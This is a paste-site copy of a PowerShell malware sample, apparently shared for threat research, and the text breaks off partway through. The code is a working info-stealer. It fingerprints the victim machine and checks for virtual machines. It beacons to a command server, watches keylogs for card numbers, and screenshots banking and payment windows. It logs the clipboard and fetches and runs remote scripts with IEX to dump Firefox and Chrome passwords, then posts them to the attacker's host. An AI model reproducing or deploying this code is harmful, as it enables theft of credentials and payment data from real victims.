SHOW:
|
|
- or go back to the newest paste.
1 | #sample found by @JohnLaTwc | |
2 | #$WebPostTimer = 1200 | |
3 | #$WebGetTimer = 1200 | |
4 | [void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | |
5 | [void] [Reflection.Assembly]::LoadWithPartialName("System.Drawing") | |
6 | ||
7 | function New-Mutex($MutexName) { | |
8 | ||
9 | #[CmdletBinding()][OutputType([PSObject])] | |
10 | #Param ([Parameter(Mandatory)][ValidateNotNullOrEmpty()][string]$MutexName) | |
11 | $MutexWasCreated = $false | |
12 | $Mutex = $Null | |
13 | Write-Verbose "Waiting to acquire lock [$MutexName]..." | |
14 | [void][System.Reflection.Assembly]::LoadWithPartialName('System.Threading') | |
15 | try { | |
16 | $Mutex = [System.Threading.Mutex]::OpenExisting($MutexName) | |
17 | } catch { | |
18 | $Mutex = New-Object System.Threading.Mutex($true, $MutexName, [ref]$MutexWasCreated) | |
19 | } | |
20 | try { if (!$MutexWasCreated) { $Mutex.WaitOne() | Out-Null } } catch { } | |
21 | Write-Verbose "Lock [$MutexName] acquired. Executing..." | |
22 | Write-Output ([PSCustomObject]@{ Name = $MutexName; Mutex = $Mutex }) | |
23 | } # New-Mutex | |
24 | function Remove-Mutex { | |
25 | <# | |
26 | .SYNOPSIS | |
27 | Removes a previously created Mutex | |
28 | .DESCRIPTION | |
29 | This function attempts to release a lock on a mutex created by an earlier call | |
30 | to New-Mutex. | |
31 | .PARAMETER MutexObject | |
32 | The PSObject object as output by the New-Mutex function. | |
33 | .INPUTS | |
34 | None. You cannot pipe objects to this function. | |
35 | .OUTPUTS | |
36 | None. | |
37 | #Requires -Version 2.0 | |
38 | #> | |
39 | #[CmdletBinding()] | |
40 | #Param ([Parameter(Mandatory)][ValidateNotNull()][PSObject]$MutexObject) | |
41 | # $MutexObject | fl * | Out-String | Write-Host | |
42 | Write-Verbose "Releasing lock [$($MutexObject.Name)]..." | |
43 | try { [void]$MutexObject.Mutex.ReleaseMutex() } catch { } | |
44 | } # Remove-Mutex | |
45 | ||
46 | new-mutex("Global\$env:username$((Get-Process -PID $pid).SessionID)") | |
47 | ||
48 | Function Get-StringHash([String] $String,$HashName = "MD5") | |
49 | { | |
50 | $StringBuilder = New-Object System.Text.StringBuilder | |
51 | [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{ | |
52 | [Void]$StringBuilder.Append($_.ToString("x2")) | |
53 | } | |
54 | $StringBuilder.ToString() | |
55 | } | |
56 | ||
57 | Function IsVirtual | |
58 | { | |
59 | $wmibios = Get-WmiObject Win32_BIOS -ErrorAction Stop | Select-Object version,serialnumber | |
60 | $wmisystem = Get-WmiObject Win32_ComputerSystem -ErrorAction Stop | Select-Object model,manufacturer | |
61 | $ResultProps = @{ | |
62 | ComputerName = $computer | |
63 | BIOSVersion = $wmibios.Version | |
64 | SerialNumber = $wmibios.serialnumber | |
65 | Manufacturer = $wmisystem.manufacturer | |
66 | Model = $wmisystem.model | |
67 | IsVirtual = $false | |
68 | VirtualType = $null | |
69 | } | |
70 | if ($wmibios.SerialNumber -like "*VMware*") { | |
71 | $ResultProps.IsVirtual = $true | |
72 | $ResultProps.VirtualType = "Virtual - VMWare" | |
73 | } | |
74 | else { | |
75 | switch -wildcard ($wmibios.Version) { | |
76 | 'VIRTUAL' { | |
77 | $ResultProps.IsVirtual = $true | |
78 | $ResultProps.VirtualType = "Virtual - Hyper-V" | |
79 | } | |
80 | 'A M I' { | |
81 | $ResultProps.IsVirtual = $true | |
82 | $ResultProps.VirtualType = "Virtual - Virtual PC" | |
83 | } | |
84 | '*Xen*' { | |
85 | $ResultProps.IsVirtual = $true | |
86 | $ResultProps.VirtualType = "Virtual - Xen" | |
87 | } | |
88 | } | |
89 | } | |
90 | if (-not $ResultProps.IsVirtual) { | |
91 | if ($wmisystem.manufacturer -like "*Microsoft*") | |
92 | { | |
93 | $ResultProps.IsVirtual = $true | |
94 | $ResultProps.VirtualType = "Virtual - Hyper-V" | |
95 | } | |
96 | elseif ($wmisystem.manufacturer -like "*VMWare*") | |
97 | { | |
98 | $ResultProps.IsVirtual = $true | |
99 | $ResultProps.VirtualType = "Virtual - VMWare" | |
100 | } | |
101 | elseif ($wmisystem.model -like "*Virtual*") { | |
102 | $ResultProps.IsVirtual = $true | |
103 | $ResultProps.VirtualType = "Unknown Virtual Machine" | |
104 | } | |
105 | } | |
106 | $results += New-Object PsObject -Property $ResultProps | |
107 | return $ResultProps.IsVirtual | |
108 | } | |
109 | ||
110 | function Escape-JSONString($str){ | |
111 | if ($str -eq $null) {return ""} | |
112 | $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t') | |
113 | return $str; | |
114 | } | |
115 | ||
116 | function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) { | |
117 | begin { | |
118 | $data = @() | |
119 | } | |
120 | process{ | |
121 | $data += $_ | |
122 | } | |
123 | ||
124 | end{ | |
125 | ||
126 | if ($data.length -eq 1 -and $forceArray -eq $false) { | |
127 | $value = $data[0] | |
128 | } else { | |
129 | $value = $data | |
130 | } | |
131 | ||
132 | if ($value -eq $null) { | |
133 | return "null" | |
134 | } | |
135 | ||
136 | ||
137 | ||
138 | $dataType = $value.GetType().Name | |
139 | ||
140 | switch -regex ($dataType) { | |
141 | 'String' { | |
142 | return "`"{0}`"" -f (Escape-JSONString $value ) | |
143 | } | |
144 | '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value} | |
145 | 'Int32|Double' {return "$value"} | |
146 | 'Boolean' {return "$value".ToLower()} | |
147 | '(System\.)?Object\[\]' { # array | |
148 | ||
149 | if ($maxDepth -le 0){return "`"$value`""} | |
150 | ||
151 | $jsonResult = '' | |
152 | foreach($elem in $value){ | |
153 | #if ($elem -eq $null) {continue} | |
154 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
155 | $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1)) | |
156 | } | |
157 | return "[" + $jsonResult + "]" | |
158 | } | |
159 | '(System\.)?Hashtable' { # hashtable | |
160 | $jsonResult = '' | |
161 | foreach($key in $value.Keys){ | |
162 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
163 | $jsonResult += | |
164 | @" | |
165 | "{0}": {1} | |
166 | "@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
167 | } | |
168 | return "{" + $jsonResult + "}" | |
169 | } | |
170 | default { #object | |
171 | if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)} | |
172 | ||
173 | return "{" + | |
174 | (($value | Get-Member -MemberType *property | % { | |
175 | @" | |
176 | "{0}": {1} | |
177 | "@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
178 | ||
179 | }) -join ', ') + "}" | |
180 | } | |
181 | } | |
182 | } | |
183 | } | |
184 | ||
185 | function Get-SystemUptime ($computer = "$env:computername") { | |
186 | $lastboot = [System.Management.ManagementDateTimeconverter]::ToDateTime("$((gwmi Win32_OperatingSystem).LastBootUpTime)") | |
187 | $uptime = (Get-Date) - $lastboot | |
188 | #Write-Host "System Uptime for $computer is: " $uptime.days "days" $uptime.hours "hours" $uptime.minutes "minutes" $uptime.seconds "seconds" | |
189 | return (($uptime.days).ToString()+"d:"+($uptime.hours).ToString()+"h:"+$uptime.minutes.ToString()+"m:"+($uptime.seconds).ToString()+"s") | |
190 | } | |
191 | ||
192 | ||
193 | $Screens = [system.windows.forms.screen]::AllScreens | |
194 | ||
195 | foreach ($Screen in $Screens) { | |
196 | $DeviceName = $Screen.DeviceName | |
197 | $Width = $Screen.Bounds.Width | |
198 | $Height = $Screen.Bounds.Height | |
199 | $IsPrimary = $Screen.Primary | |
200 | } | |
201 | $ScreenshotPath = "$env:temp\39F28DD9-0677-4EAC-91B8-2112B1515341" | |
202 | if (-not (Test-Path $ScreenshotPath)) | |
203 | { | |
204 | New-Item $ScreenshotPath -ItemType Directory -Force | |
205 | } | |
206 | $resolution = $Width.ToString()+"x"+$Height.ToString() | |
207 | $username = "$env:username".ToLower() | |
208 | $url = "https://wsusupdate.com" | |
209 | $hashid = Get-StringHash($(Get-WMIObject -class Win32_DiskDrive | Where-Object {$_.DeviceID -eq "\\.\PHYSICALDRIVE0"}).SerialNumber + ` | |
210 | $(Get-WmiObject -class Win32_OperatingSystem).SerialNumber ) | |
211 | $cpu_name = $(Get-WmiObject -class "Win32_Processor" -namespace "root/CIMV2")[0].name | |
212 | if ($cpu_name -eq $null) { $cpu_name = $(Get-WmiObject -class "Win32_Processor" -namespace "root/CIMV2").name } | |
213 | $vm = IsVirtual | |
214 | $ram = ([Math]::Round((Get-WmiObject -Class win32_computersystem).TotalPhysicalMemory/1Gb)).toString() | |
215 | $os = (Get-WmiObject -class Win32_OperatingSystem).Caption | |
216 | $os_arch = (Get-WmiObject -class Win32_OperatingSystem).OSArchitecture | |
217 | $uptime = Get-SystemUptime | |
218 | #$ext_ip = (New-Object net.webclient).downloadstring("http://checkip.dyndns.com") -replace "[^\d\.]" | |
219 | $ext_ip = '' | |
220 | $timezone = [TimeZoneInfo]::Local.BaseUtcOffset.Hours | |
221 | $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") | |
222 | if ((Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server').fDenyTSConnections -eq 1) { $rdp = $False } | |
223 | else { $rdp = $True } | |
224 | if($IsAdmin -ne $True){ | |
225 | if( ($(whoami /groups) -like "*S-1-5-32-544*").length -eq 1 ) { $IsAdmin = $True } | |
226 | } | |
227 | ||
228 | #$wan_speed = New-Object net.webclient; "{0:N2} Mbit/sec" -f ((100/(Measure-Command {$wc.Downloadfile('http://east.testmy.net/dl-100MB',"c:\speedtest.test")}).TotalSeconds)*8); del c:\speedtest.test | |
229 | ||
230 | if ((gwmi win32_computersystem).partofdomain -eq $true -and (gwmi win32_computersystem).domain -ne "WORKGROUP") { | |
231 | $domain = (gwmi win32_computersystem).domain.ToUpper() | |
232 | } | |
233 | else {$domain = 'nodomain'} | |
234 | $log_file = "$env:temp\key.log" | |
235 | $version = "04a" | |
236 | ||
237 | $params = @{"resolution" = "$resolution"; "timezone" = "$timezone"; "uptime" = "$uptime"; "computer_name" = $env:computername.ToUpper(); "isadmin" = $isadmin; "username" = "$username"; "domain" = "$domain"; "cpu_name" = "$cpu_name"; "vm" = $vm; "ram" = "$ram"; ` | |
238 | "hashid" = "$hashid"; "url" = "$url"; "log_file" = "$log_file"; "Screenshot_path" = "$ScreenshotPath"; "version" = "$version"; "os" = "$os"; "os_arch" = "$os_arch"; "rdp" = "$rdp"; "ext_ip" = "$ext_ip"} | |
239 | ||
240 | ||
241 | ||
242 | $m = $params | ConvertTo-json | |
243 | $m | |
244 | ||
245 | ||
246 | function Invoke-Start | |
247 | { | |
248 | $buffer = [System.Text.Encoding]::UTF8.GetBytes($m) | |
249 | try { | |
250 | [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($params.url+"/start") | |
251 | #[System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create("https://dweffweew.com/start") | |
252 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
253 | $webRequest.ContentType = "application/json" | |
254 | $webRequest.Timeout = 10000 | |
255 | $webRequest.Method = "POST" | |
256 | $webRequest.ContentLength = $buffer.Length; | |
257 | ||
258 | ||
259 | $requestStream = $webRequest.GetRequestStream() | |
260 | $requestStream.Write($buffer, 0, $buffer.Length) | |
261 | $requestStream.Flush() | |
262 | $requestStream.Close() | |
263 | ||
264 | [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
265 | $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
266 | $result = $streamReader.ReadToEnd() | |
267 | return $result | |
268 | } | |
269 | catch { | |
270 | return $_.Exception.Message | |
271 | } | |
272 | } | |
273 | ||
274 | While ($True) { | |
275 | $response = Invoke-Start | |
276 | if ($response -eq 'null') { | |
277 | break | |
278 | } | |
279 | $response | |
280 | Start-Sleep -s 1200 | |
281 | continue | |
282 | } | |
283 | ||
284 | ||
285 | ||
286 | function Title-Monitor | |
287 | { | |
288 | Start-Job -ScriptBlock { | |
289 | Add-Type @" | |
290 | using System; | |
291 | using System.Runtime.InteropServices; | |
292 | public class UserWindows { | |
293 | [DllImport("user32.dll")] | |
294 | public static extern IntPtr GetForegroundWindow(); | |
295 | } | |
296 | "@ | |
297 | ||
298 | $hashid = $args[0] | |
299 | $url = $args[1] | |
300 | $username = $args[2] | |
301 | $resolution = $args[3] | |
302 | $ScreenshotPath = $args[4] | |
303 | ||
304 | function Get-ScreenShot | |
305 | { | |
306 | ||
307 | ||
308 | $OutPath = "$env:temp\39F28DD9-0677-4EAC-91B8-2112B1515341" | |
309 | Add-Type -AssemblyName System.Windows.Forms | |
310 | ||
311 | ||
312 | $fileName = '{0}.jpg' -f (Get-Date).ToString('yyyyMMdd_HHmmss') | |
313 | $path = Join-Path $ScreenshotPath $fileName | |
314 | $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height) | |
315 | $g = [System.Drawing.Graphics]::FromImage($b) | |
316 | $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size) | |
317 | $g.Dispose() | |
318 | $myEncoder = [System.Drawing.Imaging.Encoder]::Quality | |
319 | $encoderParams = New-Object System.Drawing.Imaging.EncoderParameters(1) | |
320 | $encoderParams.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($myEncoder, 20) | |
321 | $myImageCodecInfo = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders()|where {$_.MimeType -eq 'image/jpeg'} | |
322 | $b.Save($path,$myImageCodecInfo, $($encoderParams)) | |
323 | } | |
324 | ||
325 | Get-ScreenShot | |
326 | ||
327 | #filter Luhn($x){$l=$x.Length-1;$l..0|%{$d=$x[$_]-48;if($_%2-eq$l%2){$s+=$d}elseif($d-le4){$s+=$d*2}else{$s+=$d*2-9}};!($s%10)} | |
328 | ||
329 | function Luhn([int[]]$digits){ | |
330 | ||
331 | [int]$sum=0 | |
332 | [bool]$alt=$false | |
333 | ||
334 | for($i = $digits.length - 1; $i -ge 0; $i--){ | |
335 | if($alt){ | |
336 | $digits[$i] *= 2 | |
337 | if($digits[$i] -gt 9) { $digits[$i] -= 9 } | |
338 | } | |
339 | ||
340 | $sum += $digits[$i] | |
341 | $alt = !$alt | |
342 | } | |
343 | ||
344 | return ($sum % 10) -eq 0 | |
345 | } | |
346 | ||
347 | ||
348 | $luhn_matches_previous = 0 | |
349 | while ($True) { | |
350 | $Process = Get-Process | ? {$_.MainWindowHandle -eq ([UserWindows]::GetForegroundWindow())} | |
351 | ||
352 | if (Test-Path "$env:TEMP\key.log") { | |
353 | $keystring = '' | |
354 | (Get-Content $env:temp\key.log) | foreach { $keystring += $_.split(",")[0].replace('"', '') } | |
355 | $luhn_matches = @() | |
356 | Select-String -Pattern "[456][0-9]{15}|3[0-9]{14}" -InputObject $keystring -AllMatches | foreach {$_.matches} | Select-String -NotMatch "(\d)\1{5,}" | foreach { if (luhn([int[]][string[]][char[]]$_.value) -eq $true) {$luhn_matches += $True}} | |
357 | if ($luhn_matches.length -lt $luhn_matches_previous) { $luhn_matches_previous = 0 } | |
358 | if (($luhn_matches -contains $True) -and ($luhn_matches.length -gt $luhn_matches_previous)) { | |
359 | ||
360 | 1..20 | % { | |
361 | ||
362 | Get-ScreenShot | |
363 | Start-Sleep -Seconds 5 | |
364 | ||
365 | } | |
366 | $luhn_matches_previous = $luhn_matches.length | |
367 | } | |
368 | } | |
369 | ||
370 | ||
371 | ||
372 | ||
373 | if (Test-Path $env:temp\keywords.txt) { | |
374 | $keywords = ((Get-Content $env:temp\keywords.txt).split(' '))[1].split('|') | |
375 | foreach ($keyword in $keywords) {if (($Process.MainWindowTitle -clike "*$keyword*" ) -and (Test-Path "$env:TEMP\key.log")) { | |
376 | 1..20 | % { | |
377 | Get-ScreenShot | |
378 | Start-Sleep -Seconds 5 | |
379 | } | |
380 | } | |
381 | } | |
382 | } | |
383 | if (($Process.MainWindowTitle -like '*checkout*') -or ($Process.MainWindowTitle -like '*Pay-Me-Now*') ` | |
384 | -or ($Process.MainWindowTitle -like '*Sign On - Citibank*') -or ($Process.MainWindowTitle -like 'Sign in or Register | eBay')` | |
385 | -or ($Process.MainWindowTitle -like '*Credit Card*') -or ($Process.MainWindowTitle -like '*Place Your Order*') ` | |
386 | -or ($Process.MainWindowTitle -clike '*Banking*') -or ($Process.MainWindowTitle -like '*Log in to your PayPal account*') ` | |
387 | -or ($Process.MainWindowTitle -like '*Expedia Partner*Central*') -or ($Process.MainWindowTitle -like '*Booking.com Extranet*') ` | |
388 | -or ($Process.MainWindowTitle -like '*Chase Online - Logon*') -or ($Process.MainWindowTitle -like '*One Time Pay*') ` | |
389 | -or ($Process.MainWindowTitle -clike '*LogMeIn*') -or ($Process.MainWindowTitle -clike '*Windows Security*') ` | |
390 | -or ($Process.MainWindowTitle -like '*Choose a way to pay*') -or ($Process.MainWindowTitle -like '*payment information*') ` | |
391 | -or ($Process.MainWindowTitle -clike '*Change Reservation*') -or ($Process.MainWindowTitle -clike '*POS*') ` | |
392 | -or ($Process.MainWindowTitle -like '*Virtual*Terminal*') -or ($Process.MainWindowTitle -like '*PayPal: Wallet*') ` | |
393 | -or ($Process.MainWindowTitle -like '*iatspayment*') -or ($Process.MainWindowTitle -like '*LogMeIn*') ` | |
394 | -or ($Process.MainWindowTitle -clike '*Authorize.Net*') -or ($Process.MainWindowTitle -like '*LogMeIn*') ` | |
395 | -or ($Process.MainWindowTitle -clike '*Discover Card*') -or ($Process.MainWindowTitle -like '*LogMeIn*') ` | |
396 | -or ($Process.MainWindowTitle -like '*ewallet*') -or ($Process.MainWindowTitle -like '*arcot*') ` | |
397 | -or ($Process.MainWindowTitle -clike '*PayTrace*') -or ($Process.MainWindowTitle -clike '*New Charge*') ` | |
398 | -or ($Process.MainWindowTitle -clike '*Verification*') -or ($Process.MainWindowTitle -clike '*PIN*') ` | |
399 | -or ($Process.MainWindowTitle -clike '*Authentication*') -or ($Process.MainWindowTitle -clike '*Password*') ` | |
400 | -or ($Process.MainWindowTitle -clike '*Debit Card*') -or ($Process.MainWindowTitle -clike '*Activation*') ` | |
401 | -or ($Process.MainWindowTitle -clike '*LastPass*') -or ($Process.MainWindowTitle -clike '*SSN*') ` | |
402 | -or ($Process.MainWindowTitle -clike '*Driver*License*') -or ($Process.MainWindowTitle -clike '*Check-in for*') ` | |
403 | -or ($Process.MainWindowTitle -clike '*Umpqua*') -or ($Process.MainWindowTitle -clike '*ePayment*') ` | |
404 | -or ($Process.MainWindowTitle -clike '*Converge -*') -or ($Process.MainWindowTitle -clike '*Swipe*') ` | |
405 | -or ($Process.MainWindowTitle -like '*Payrazr*') -or ($Process.MainWindowTitle -clike '*Hosted -*') ` | |
406 | -and (Test-Path "$env:TEMP\key.log")) { | |
407 | 1..20 | % { | |
408 | ||
409 | Get-ScreenShot | |
410 | Start-Sleep -Seconds 5 | |
411 | } | |
412 | } | |
413 | Start-Sleep -Seconds 5 | |
414 | } | |
415 | } -ArgumentList $params.hashid, $params.url, $params.username, $params.resolution, $params.Screenshot_Path | |
416 | } | |
417 | ||
418 | ||
419 | function Gclip { | |
420 | Start-Job -ScriptBlock { | |
421 | ||
422 | $PollInterval = 3 | |
423 | ||
424 | ||
425 | Add-Type -AssemblyName System.Windows.Forms | |
426 | ||
427 | # used to check if the contents have changed | |
428 | $PrevLength = 0 | |
429 | $PrevFirstChar = "" | |
430 | ||
431 | for(;;){ | |
432 | ||
433 | # stolen/adapted from http://brianreiter.org/2010/09/03/copy-and-paste-with-clipboard-from-powershell/ | |
434 | $tb = New-Object System.Windows.Forms.TextBox | |
435 | $tb.Multiline = $true | |
436 | $tb.Paste() | |
437 | ||
438 | # only output clipboard data if it's changed | |
439 | if (($tb.Text.Length -ne 0) -and ($tb.Text.Length -ne $PrevLength)){ | |
440 | # if the length isn't 0, the length has changed, and the first character | |
441 | # has changed, assume the clipboard has changed | |
442 | # YES I know there might be edge cases :) | |
443 | if($PrevFirstChar -ne ($tb.Text)[0]){ | |
444 | $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff) | |
445 | #Out-File -FilePath "$env:Temp\Applnsights_VisualStudio.txt" -Append -InputObject "`========== CLIPBOARD ==========`n" -Encoding unicode | |
446 | Out-File -FilePath "$env:Temp\Applnsights_VisualStudio.txt" -Append -InputObject $tb.Text -Encoding unicode | |
447 | $PrevFirstChar = ($tb.Text)[0] | |
448 | $PrevLength = $tb.Text.Length | |
449 | } | |
450 | } | |
451 | ||
452 | Start-Sleep -s $PollInterval | |
453 | } | |
454 | } | |
455 | } | |
456 | ||
457 | ||
458 | function GetFF { | |
459 | Start-Job -ScriptBlock { | |
460 | function Escape-JSONString($str){ | |
461 | if ($str -eq $null) {return ""} | |
462 | $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t') | |
463 | return $str; | |
464 | } | |
465 | ||
466 | function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) { | |
467 | begin { | |
468 | $data = @() | |
469 | } | |
470 | process{ | |
471 | $data += $_ | |
472 | } | |
473 | ||
474 | end{ | |
475 | ||
476 | if ($data.length -eq 1 -and $forceArray -eq $false) { | |
477 | $value = $data[0] | |
478 | } else { | |
479 | $value = $data | |
480 | } | |
481 | ||
482 | if ($value -eq $null) { | |
483 | return "null" | |
484 | } | |
485 | ||
486 | ||
487 | ||
488 | $dataType = $value.GetType().Name | |
489 | ||
490 | switch -regex ($dataType) { | |
491 | 'String' { | |
492 | return "`"{0}`"" -f (Escape-JSONString $value ) | |
493 | } | |
494 | '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value} | |
495 | 'Int32|Double' {return "$value"} | |
496 | 'Boolean' {return "$value".ToLower()} | |
497 | '(System\.)?Object\[\]' { # array | |
498 | ||
499 | if ($maxDepth -le 0){return "`"$value`""} | |
500 | ||
501 | $jsonResult = '' | |
502 | foreach($elem in $value){ | |
503 | #if ($elem -eq $null) {continue} | |
504 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
505 | $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1)) | |
506 | } | |
507 | return "[" + $jsonResult + "]" | |
508 | } | |
509 | '(System\.)?Hashtable' { # hashtable | |
510 | $jsonResult = '' | |
511 | foreach($key in $value.Keys){ | |
512 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
513 | $jsonResult += | |
514 | @" | |
515 | "{0}": {1} | |
516 | "@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
517 | } | |
518 | return "{" + $jsonResult + "}" | |
519 | } | |
520 | default { #object | |
521 | if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)} | |
522 | ||
523 | return "{" + | |
524 | (($value | Get-Member -MemberType *property | % { | |
525 | @" | |
526 | "{0}": {1} | |
527 | "@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
528 | ||
529 | }) -join ', ') + "}" | |
530 | } | |
531 | } | |
532 | } | |
533 | } | |
534 | ||
535 | $url = $args[0] | |
536 | ||
537 | $resolution = $args[1] | |
538 | $domain = $args[2] | |
539 | $computer_name = $args[3] | |
540 | $username = $args[4] | |
541 | $timezone = $args[5] | |
542 | $hashid = $args[6] | |
543 | $version = $args[7] | |
544 | ||
545 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
546 | & cmd /c %systemroot%\syswow64\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('https://wsusupdate.com/script?id=random&name=firefox'); Get-FoxDump -OutFile $env:temp\firefox.log; Exit" | |
547 | & cmd /c %systemroot%\system32\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('https://wsusupdate.com/script?id=random&name=firefox'); Get-FoxDump -OutFile $env:temp\firefox.log; Exit" | |
548 | ||
549 | If (Test-Path "$env:temp\firefox.log") { | |
550 | $content = Get-Content $env:temp\firefox.log | Out-String | |
551 | $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($content)) | |
552 | $json = @{"resolution" = $resolution; "domain" = $domain; "computer_name" = $computer_name; "username" = $username; "timezone" = $timezone; "hashid" = $hashid; "version" = $version; "content" = $content; "type" = "ffbrwpwd"} | |
553 | $log_json = $json | ConvertTo-Json | |
554 | $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json) | |
555 | [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url+"/pshlog") | |
556 | $webRequest.ContentType = "application/json" | |
557 | $webRequest.Timeout = 10000 | |
558 | $webRequest.Method = "POST" | |
559 | $webRequest.ContentLength = $buffer.Length; | |
560 | $requestStream = $webRequest.GetRequestStream() | |
561 | $requestStream.Write($buffer, 0, $buffer.Length) | |
562 | $requestStream.Flush() | |
563 | $requestStream.Close() | |
564 | ||
565 | [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
566 | $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
567 | $result = $streamReader.ReadToEnd() | |
568 | Remove-Item "$env:temp\firefox.log" | |
569 | } | |
570 | } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version | |
571 | } | |
572 | ||
573 | function GetChrome { | |
574 | Start-Job -ScriptBlock { | |
575 | function Escape-JSONString($str){ | |
576 | if ($str -eq $null) {return ""} | |
577 | $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t') | |
578 | return $str; | |
579 | } | |
580 | ||
581 | function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) { | |
582 | begin { | |
583 | $data = @() | |
584 | } | |
585 | process{ | |
586 | $data += $_ | |
587 | } | |
588 | ||
589 | end{ | |
590 | ||
591 | if ($data.length -eq 1 -and $forceArray -eq $false) { | |
592 | $value = $data[0] | |
593 | } else { | |
594 | $value = $data | |
595 | } | |
596 | ||
597 | if ($value -eq $null) { | |
598 | return "null" | |
599 | } | |
600 | ||
601 | ||
602 | ||
603 | $dataType = $value.GetType().Name | |
604 | ||
605 | switch -regex ($dataType) { | |
606 | 'String' { | |
607 | return "`"{0}`"" -f (Escape-JSONString $value ) | |
608 | } | |
609 | '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value} | |
610 | 'Int32|Double' {return "$value"} | |
611 | 'Boolean' {return "$value".ToLower()} | |
612 | '(System\.)?Object\[\]' { # array | |
613 | ||
614 | if ($maxDepth -le 0){return "`"$value`""} | |
615 | ||
616 | $jsonResult = '' | |
617 | foreach($elem in $value){ | |
618 | #if ($elem -eq $null) {continue} | |
619 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
620 | $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1)) | |
621 | } | |
622 | return "[" + $jsonResult + "]" | |
623 | } | |
624 | '(System\.)?Hashtable' { # hashtable | |
625 | $jsonResult = '' | |
626 | foreach($key in $value.Keys){ | |
627 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
628 | $jsonResult += | |
629 | @" | |
630 | "{0}": {1} | |
631 | "@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
632 | } | |
633 | return "{" + $jsonResult + "}" | |
634 | } | |
635 | default { #object | |
636 | if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)} | |
637 | ||
638 | return "{" + | |
639 | (($value | Get-Member -MemberType *property | % { | |
640 | @" | |
641 | "{0}": {1} | |
642 | "@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
643 | ||
644 | }) -join ', ') + "}" | |
645 | } | |
646 | } | |
647 | } | |
648 | } | |
649 | ||
650 | $url = $args[0] | |
651 | ||
652 | $resolution = $args[1] | |
653 | $domain = $args[2] | |
654 | $computer_name = $args[3] | |
655 | $username = $args[4] | |
656 | $timezone = $args[5] | |
657 | $hashid = $args[6] | |
658 | $version = $args[7] | |
659 | ||
660 | ||
661 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
662 | & cmd /c %systemroot%\system32\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('https://wsusupdate.com/script?id=random&name=chrome'); Stop-Process -name chrome -ErrorAction SilentlyContinue; Start-sleep -seconds 3; Get-ChromeDump -OutFile $env:temp\chrome.log; Exit" | |
663 | Start-Sleep -Seconds 60 | |
664 | If (Test-Path "$env:temp\chrome.log") { | |
665 | #$content = [IO.File]::ReadAllText("$env:temp\chrome.log") | |
666 | $content = Get-Content "$env:temp\chrome.log" | Out-String | |
